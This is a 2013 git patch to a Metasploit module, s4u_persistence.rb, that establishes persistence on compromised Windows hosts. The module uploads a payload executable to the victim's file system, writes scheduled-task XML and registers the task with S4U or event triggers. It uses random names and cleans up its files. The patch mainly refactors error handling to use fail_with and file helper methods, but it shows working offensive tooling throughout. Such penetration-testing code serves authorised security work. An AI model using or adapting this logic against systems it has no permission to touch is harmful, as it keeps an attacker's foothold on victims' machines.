From bbf8fe0213ed884e0745b748029182313d9149cb Mon Sep 17 00:00:00 2001 From: smilingraccoon Date: Wed, 13 Feb 2013 18:10:05 -0500 Subject: [PATCH] Use Post::File methods and fail_with --- .../exploits/windows/local/s4u_persistence.rb | 72 +++++++------------ 1 file changed, 26 insertions(+), 46 deletions(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 0d5189064a..9f00f8d528 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -39,6 +39,7 @@ class Metasploit3 < Msf::Exploit::Local 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], + 'DisclosureDate' => [ 'Jan 2 2013' ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], @@ -66,15 +67,13 @@ class Metasploit3 < Msf::Exploit::Local def exploit if not (sysinfo['OS'] =~ /Build [6-9]\d\d\d/) - print_error("This module only works on Vista/2008 and above") - return + fail_with(Exploit::Failure::NoTarget, "This module only works on Vista/2008 and above") end if datastore['TRIGGER'] == "event" if datastore['EVENT_LOG'].nil? or datastore['EVENT_ID'].nil? - print_error("Advanced options EVENT_LOG and EVENT_ID required for event") print_status("The properties of any event in the event viewer will contain this information") - return + fail_with(Exploit::Failure::BadConfig, "Advanced options EVENT_LOG and EVENT_ID required for event") end end @@ -88,8 +87,7 @@ class Metasploit3 < Msf::Exploit::Local xml_path,rexe_path = generate_path(rexename) # Upload REXE to victim fs - upload_response = upload_rexe(rexe_path, payload) - return if not upload_response + upload_rexe(rexe_path, payload) # Create basic XML outline xml = create_xml(rexe_path) @@ -98,16 +96,13 @@ class Metasploit3 < Msf::Exploit::Local xml = add_xml_triggers(xml) # Write XML to victim fs, if fail clean up - if not write_xml(xml, xml_path) - delete_file(rexe_path) - return - end + write_xml(xml, xml_path, rexe_path) # Name task with Opt or give random name schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) # Create task with modified XML - task = create_task(xml_path, schname, rexe_path) + create_task(xml_path, schname, rexe_path) end ############################################################## @@ -115,16 +110,11 @@ class Metasploit3 < Msf::Exploit::Local # Returns name def generate_rexename - if datastore['REXENAME'].nil? - rexename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" - return rexename - elsif datastore['REXENAME'] =~ /\.exe$/ - rexename = datastore['REXENAME'] - return rexename - else + rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + if not rexename =~ /\.exe$/ print_warning("#{datastore['REXENAME']} isn't an exe") - return rexename end + return rexename end ############################################################## @@ -133,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local def generate_path(rexename) # generate a path to write payload and xml - path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%") + path = datastore['PATH'] || expand_path("%TEMP%") xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" rexe_path = "#{path}\\#{rexename}" return xml_path,rexe_path @@ -146,19 +136,15 @@ class Metasploit3 < Msf::Exploit::Local def upload_rexe(path, payload) vprint_status("Uploading #{path}") if file? path - print_error("File #{path} already exists...exiting") - return false + fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") end begin - fd = client.fs.file.new(path, "wb") - fd.write(payload) - fd.close - rescue - print_error("Could not upload to #{path}") - return false + write_file(path, payload) + rescue => e + puts e + fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}") end print_status("Successfully uploaded remote executable to #{path}") - return true end ############################################################## @@ -317,21 +303,18 @@ class Metasploit3 < Msf::Exploit::Local # Takes the XML and a path and writes file to filesystem # Returns boolean for success - def write_xml(xml, path) + def write_xml(xml, path, rexe_path) + if file? path + delete_file(rexe_path) + fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") + end begin - if file? path - print_error("File #{path} already exists...exiting") - return false - end - fd = session.fs.file.new(path, "wb") - fd.write(xml) - fd.close + write_file(path, xml) rescue - print_error("Issues writing XML to #{path}") - return false + delete_file(rexe_path) + fail_with(Exploit::Failure::Unknown, "Issues writing XML to #{path}") end print_status("Successfully wrote XML file to #{path}") - return true end ############################################################## @@ -340,12 +323,10 @@ class Metasploit3 < Msf::Exploit::Local def delete_file(path) begin - session.fs.file.rm(path) + file_rm(path) rescue print_warning("Could not delete file #{path}, delete manually") - return false end - return true end ############################################################## @@ -381,14 +362,13 @@ class Metasploit3 < Msf::Exploit::Local :delete_commands => del_task } ) - return true elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/ print_error("The scheduled task name is already in use") # Clean up delete_file(rexe_path) delete_file(path) else - print_error("Issues creating task using XML file schtasks") + error = "Issues creating task using XML file schtasks" vprint_error("Error: #{create_task_response}") if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "Event" print_warning("Security log can restricted by UAC, try a different trigger") @@ -396,7 +376,7 @@ class Metasploit3 < Msf::Exploit::Local # Clean up delete_file(rexe_path) delete_file(path) - return false + fail_with(Exploit::Failure::Unknown, error) end end end \ No newline at end of file